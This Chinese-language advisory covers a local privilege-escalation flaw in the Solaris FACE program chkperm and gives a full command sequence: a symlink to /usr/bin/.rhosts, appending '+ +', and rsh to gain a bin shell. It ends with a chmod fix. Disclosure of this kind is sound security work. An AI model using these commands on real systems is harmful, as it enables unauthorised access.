涉及程序: FACE软件包中的chkperm 描述: Access Command Environment包含的漏洞 详细: Solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 FACE (Framed Access Command Environment)的软件包。在这个软件包 中有一个程序chkperm是问题所在,
涉及程序:
FACE软件包中的chkperm
描述:
Access Command Environment包含的漏洞
详细:
Solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 FACE (Framed Access Command Environment)的软件包。在这个软件包 中有一个程序"chkperm"是问题所在,他是用来用户是否有使用FACE许可的程序。 这漏洞将可以轻易造出一个BIN用户。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell... % id
uid=2(bin) gid=2(bin)
受影响的系统;
安装了(FACEFramed Access Command Environment)Solaris 2.4, 2.5 (?), 2.5.1(?) and 或其他源于System V 的UNIX系统。
解决方案:
CNNS为您提供完善的网络安全服务。
安全建议:
% chmod ug-s /usr/vmsys/bin/chkperm
下载本文
